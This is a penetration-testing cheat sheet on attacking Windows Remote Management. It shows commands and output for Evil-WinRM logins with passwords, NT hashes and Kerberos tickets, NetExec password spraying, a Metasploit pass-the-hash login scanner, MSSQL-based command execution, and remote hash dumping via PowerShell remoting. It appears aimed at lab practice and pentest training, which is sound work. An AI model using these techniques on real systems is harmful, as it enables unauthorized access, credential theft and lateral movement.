WinRM (5985, 5986)

Nmap

nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n

Evil-WinRM

Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

If you get the error above on connecting to a host, you can add these following lines to /etc/ssl/openssl.cnf .

[legacy_sect]
activate = 1

evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!

evil-winrm -u "$USER" -H "$NT_HASH" -i "$TARGET"`

To use evil-winrm to connect to an IPv6 address create an entry inside /etc/hosts setting a domain name to the IPv6 address and connect to that domain.

SQL (hacker  dbo@flag)> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("ipconfig");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: 

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::1001
   IPv6 Address. . . . . . . . . . . : dead:beef::7912:217c:56e7:f15b
   Link-local IPv6 Address . . . . . : fe80::d379:8c3e:971a:5199%8
   IPv4 Address. . . . . . . . . . . : 10.13.38.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:fe94:1921%8
                                       10.13.38.2

Ethernet adapter Ethernet1 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.20.128.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Express Edition will continue to be enforced.

SQL (hacker  dbo@flag)> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("hostname");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: 
COMPATIBILITY

Express Edition will continue to be enforced.

# cat /etc/hosts | grep comp
dead:beef::1001 compatibility

# evil-winrm -u 'administrator' -p 'SecretPassword' -i compatibility
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

With Kerberos

$ cat /etc/krb5.conf
[libdefaults]
    default_realm = DOMAIN.HTB

[realms]
    DOMAIN.HTB = {
        kdc = dc01.domain.htb
    }

[domain_realm]
    .domain.htb = DOMAIN.HTB
    domain.htb = DOMAIN.HTB        

$ impacket-getTGT 'domain.htb/username:password' -dc-ip 10.10.11.31 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in m.harris.ccache

$ KRB5CCNAME=username.ccache evil-winrm -u username -i dc01.domain.htb -r domain.htb
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\username\Documents>

With docker

docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 10.129.111.232 -u Administrator -p 'password'

Evil-WinRM

Upload

*Evil-WinRM* PS C:\Users\Administrator\Documents> upload PowerView.ps1 C:\Users\Administrator\Desktop

Download

*Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip

Python - evil-winrm-py

GitHub - adityatelange/evil-winrm-py: Execute commands interactively on remote Windows machines using the WinRM protocolGitHub

Metasploit

WinRMMetasploit Documentation Penetration Testing Software, Pen Testing Security

Metasploit

msf6 auxiliary(scanner/winrm/winrm_login) > set rhosts 192.168.210.17
rhosts => 192.168.210.17
msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME Administrator
USERNAME => Administrator
msf6 auxiliary(scanner/winrm/winrm_login) > set DOMAIN internal.zsm.local
DOMAIN => internal.zsm.local
msf6 auxiliary(scanner/winrm/winrm_login) > set PASSWORD aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
PASSWORD => aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
msf6 auxiliary(scanner/winrm/winrm_login) > run

[!] No active DB -- Credential data will not be saved!
[+] 192.168.210.17:5985 - Login Successful: 

Netexec - CME

NetExec - CME

$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] http://10.129.42.197:5985/wsman
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)

Command execution

[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB         10.129.202.136  445    WINSRV           [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM       10.129.202.136  5985   WINSRV           [+] WINSRV\john:november (admin)
WINRM       10.129.202.136  5985   WINSRV           [+] Executed command (shell type: powershell)
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           Directory: C:\
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           Mode                LastWriteTime         Length Name
WINRM       10.129.202.136  5985   WINSRV           ----                -------------         ------ ----
WINRM       10.129.202.136  5985   WINSRV           d-----       12/14/2020   7:11 PM                PerfLogs
WINRM       10.129.202.136  5985   WINSRV           d-r---       12/14/2020   6:38 PM                Program Files
WINRM       10.129.202.136  5985   WINSRV           d-----        2/11/2022   6:10 AM                Program Files (x86)
WINRM       10.129.202.136  5985   WINSRV           d-r---         1/6/2022   6:49 AM                Users
WINRM       10.129.202.136  5985   WINSRV           d-----       12/14/2020   7:11 PM                Windows
WINRM       10.129.202.136  5985   WINSRV           
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace # 

PSSession

Enabled by default on Server 2012 onwards with firewall exception

PSRemoting uses WinRM

On Desktop, may need to enable remoting (admin privs needed): Enable-PSRemoting

Month of PowerShell - PowerShell Remoting, Part 1SANS Institute

New-PSSession (Microsoft.PowerShell.Core) - PowerShellMicrosoftLearn

Commandes PowerShell Remoting : Guide de NBS SYSTEMNBS System

Create a session on a remote computer

$Server01 = New-PSSession -ComputerName Server01

List PSSession

Get-PSSession

Enter-PSSession

To use the PSSession to interact directly with a remote computer, use the Enter-PSSession cmdlet

PS C:\WINDOWS\system32> Enter-PSSession -ComputerName SEC504STUDENT
[SEC504STUDENT]: PS C:\Users\Sec504\Documents>

[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Get-Service | Where-Object -Property Status -EQ Running

Status   Name               DisplayName
------   ----               -----------
Running  AarSvc_75beb       Agent Activation Runtime_75beb
Running  Appinfo            Application Information
Running  AppXSvc            AppX Deployment Service (AppXSVC)
Running  AudioEndpointBu... Windows Audio Endpoint Builder
Running  Audiosrv           Windows Audio
Running  BFE                Base Filtering Engine
...

[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Exit-PSSession
PS C:\WINDOWS\system32>

Pass Username / password

New-PSSession -Session $s -Credential Domain01\User01

With a variable

PS C:\WINDOWS\system32> $cred = Get-Credential

cmdlet Get-Credential at command pipeline position 1
Supply values for the following parameters:
Credential
PS C:\WINDOWS\system32> $cred

UserName                     Password
--------                     --------
sec504   System.Security.SecureString

Or

$Username = « USERNAME »
$SecurePassword = « PLAINPASSWORD » | ConvertTo-SecureString -AsPlainText -Force
$PScred = New-Object System.Management.Automation.PSCredential -ArgumentList $UserName,$SecurePassword

$cred = New-Object Management.Automation.PSCredential ("Administrator", (ConvertTo-SecureString "Sup3Rp@ssw0rd" -AsPlainText -Force))

PS C:\WINDOWS\system32> Enter-PSSession -ComputerName SEC504STUDENT -Credential $cred
[SEC504STUDENT]: PS C:\Users\Sec504\Documents> $env:USERNAME
Sec504
[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Exit-PSSession
PS C:\WINDOWS\system32>

Interact with an existing session

Enter-PSSession -Id 19
Enter-PSSession -Name Session1
Enter-PSSession -Session $session1

Execute command or scriptblocks

Invoke-Command -ScriptBlock{hostname;whoami} -Session $session1
Invoke-Command -ScriptBlock{C:\Users\Public\hostname.ps1} -Session $session1

Invoke-Command -ScriptBlock{Get-Process} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -FilePath C:\scripts\script.ps1 -ComputerName (Get-Content <list_of_servers>)

Execute locally loaded function on the remote machines

Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)

Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList

Stateful commands

$Sess = New-PSSession -Computername Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}

Winrs

winrs -remote:server1 -u:server1\administrator -p:passw0rd hostname

WSMan-WinRM

GitHub - bohops/WSMan-WinRM: A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM objectGitHub

Resources

5985,5986 - Pentesting WinRM - HackTricksbook.hacktricks.xyz

WinRM Penetration TestingHacking Articles

Lateral Movement – WinRMPenetration Testing Lab

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Nmap Network Scanning The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals.

• The Art of Network Penetration Testing A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.

• Network Basics for Hackers The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.